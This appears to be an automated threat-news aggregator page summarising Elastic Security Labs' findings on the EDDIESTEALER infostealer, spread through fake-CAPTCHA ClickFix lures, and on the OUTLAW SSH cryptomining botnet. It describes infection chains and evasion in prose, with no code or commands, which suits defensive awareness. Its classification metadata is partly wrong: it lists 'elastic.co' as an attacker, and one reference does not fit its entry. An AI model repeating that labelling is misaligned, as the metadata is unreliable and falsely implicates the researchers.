FlagThis - #elastic

A new Rust-based infostealer, EDDIESTEALER, is being spread using the ClickFix social engineering technique, according to a report by Elastic Security Labs on May 30, 2025. This method leverages fake CAPTCHA prompts on compromised websites. Users are tricked into copying and pasting a PowerShell command into their Windows terminal, believing they are verifying they aren't a robot. This command then downloads and executes a malicious JavaScript file, gverify.js, which in turn retrieves the final EDDIESTEALER payload.

The EDDIESTEALER malware is designed to steal sensitive information from infected hosts. Written in Rust, it avoids static analysis through various obfuscation techniques, including XOR string encryption and stripping of function symbols. The malware dynamically retrieves a task list from the attacker's command-and-control (C2) server, enabling it to adapt its behavior over time. Elastic Security Labs has observed it targeting a range of cryptocurrency wallets, web browsers, password managers, FTP clients, and the Telegram messaging app.

EDDIESTEALER also employs several evasion techniques, including a basic anti-sandbox check, a self-deletion mechanism, and a custom Windows API lookup method to avoid static analysis of its API interactions. The dynamic C2 tasking method allows attackers to update the list of targeted apps as needed, providing greater flexibility and adaptability. Security experts emphasize the continued popularity of the ClickFix social engineering method and the increasing use of the Rust programming language among malware developers in campaigns like this.


References :

• Anonymous ???????? :af:: “Prove you're not a robot” — turns into full system breach! Hackers are using fake CAPTCHA checks to deploy a stealthy new Rust malware, EDDIESTEALER, via ClickFix—a social engineering trick abusing PowerShell on Windows , ,
• securityonline.info: EDDIESTEALER: New Rust Infostealer Uses Fake CAPTCHAs to Hijack Crypto Wallets & Data
• The Hacker News: New EDDIESTEALER Malware Bypasses Chrome's App-Bound Encryption to Steal Browser Data
• www.scworld.com: ClickFix used to spread novel Rust-based infostealer

Classification:

• HashTags: #EDDIESTEALER #RustMalware #ClickFix
• Company: Elastic
• Target: Windows Users, Crypto Wallets
• Attacker: elastic.co
• Product: Windows
• Feature: ClickFix Social Engineering
• Malware: EDDIESTEALER
• Type: Malware
• Severity: HighRisk

Elastic Security Labs has identified a new information stealer called EDDIESTEALER, a Rust-based malware distributed through fake CAPTCHA campaigns. These campaigns trick users into executing malicious PowerShell scripts, which then deploy the infostealer onto their systems. EDDIESTEALER is hosted on multiple adversary-controlled web properties and employs the ClickFix social engineering tactic, luring unsuspecting individuals with the promise of CAPTCHA verification. The malware aims to harvest sensitive data, including credentials, browser information, and cryptocurrency wallet details.

This attack chain begins with threat actors compromising legitimate websites, injecting malicious JavaScript payloads that present bogus CAPTCHA check pages. Users are instructed to copy and paste a PowerShell command into their Windows terminal as verification, which retrieves and executes a JavaScript file called gverify.js. This script, in turn, fetches the EDDIESTEALER binary from a remote server, saving it in the downloads folder with a pseudorandom filename. The malware dynamically retrieves configuration data from a command-and-control server, allowing it to adapt its behavior and target specific programs.

EDDIESTEALER is designed to gather system metadata and siphon data of interest from infected hosts, including cryptocurrency wallets, web browsers, password managers, FTP clients, and messaging apps like Telegram. The malware incorporates string encryption, a custom WinAPI lookup mechanism, and a mutex to prevent multiple instances from running. It also includes anti-sandbox checks and a self-deletion technique using NTFS Alternate Data Streams to evade detection. The dynamic C2 tasking gives attackers flexibility, highlighting the ongoing threat of ClickFix campaigns and the increasing use of Rust in malware development.


References :

• Virus Bulletin: Elastic Security Labs has uncovered a novel Rust-based infostealer distributed via Fake CAPTCHA campaigns that trick users into executing a malicious PowerShell script. EDDIESTEALER is hosted on multiple adversary-controlled web properties.
• The Hacker News: New EDDIESTEALER Malware Bypasses Chrome's App-Bound Encryption to Steal Browser Data
• www.scworld.com: ClickFix used to spread novel Rust-based infostealer
• Anonymous ???????? :af:: “Prove you're not a robot†— turns into full system breach! Hackers are using fake CAPTCHA checks to deploy a stealthy new Rust malware, EDDIESTEALER, via ClickFix—a social engineering trick abusing PowerShell on Windows , ,
• securityonline.info: EDDIESTEALER: New Rust Infostealer Uses Fake CAPTCHAs to Hijack Crypto Wallets & Data
• malware.news: Cybersecurity researchers have identified a sophisticated malware campaign utilizing deceptive CAPTCHA interfaces to distribute EddieStealer, a Rust-based information stealing malware that targets sensitive user data across multiple platforms.
• cyberpress.org: ClickFix Technique Used by Threat Actors to Spread EddieStealer Malware
• gbhackers.com: Threat Actors Leverage ClickFix Technique to Deploy EddieStealer Malware

Classification:

• HashTags: #EDDIESTEALER #InfoStealer #FakeCAPTCHA
• Company: Elastic
• Target: Users
• Product: Elastic Security Labs
• Feature: data theft
• Malware: EDDIESTEALER
• Type: Malware
• Severity: Medium

The OUTLAW Linux botnet is rapidly expanding by targeting vulnerable SSH servers through brute-force attacks. Cybersecurity researchers have identified the botnet, also known as Dota, as an "auto-propagating" cryptocurrency mining operation that uses simple yet effective techniques to maintain persistence on compromised systems. This includes exploiting weak credentials, manipulating SSH keys, and leveraging cron jobs to ensure the malware restarts after reboots or termination attempts.

The botnet uses a multi-stage infection process, beginning with a dropper shell script that downloads and unpacks a malicious archive file. This file launches a modified XMRig miner for cryptojacking and installs components in hidden directories to avoid detection. The botnet also uses a custom SSH brute-forcer called BLITZ to scan for and infect other vulnerable systems on the network, perpetuating its spread in a worm-like fashion. Despite its basic techniques, OUTLAW has proven to be a persistent and effective threat.


References :

• securityonline.info: Outlaw Linux Malware: Persistent Threat Leveraging Simplicity
• www.scworld.com: Additional details on Outlaw Linux cryptomining botnet emerge
• Cyber Security News: Attackers aim to find zero-days in the PAN-OS gateways they can exploit.
• The Hacker News: Cybersecurity researchers have shed light on an "auto-propagating" cryptocurrency mining botnet called Outlaw (aka Dota) that's known for targeting SSH servers with weak credentials.

Classification:

• HashTags: #Linux #Botnet #Cryptomining
• Company: Elastic
• Target: Vulnerable SSH Servers
• Attacker: Outlaw
• Product: SSH
• Feature: SSH Brute Force
• Malware: Dota
• Type: Malware
• Severity: Medium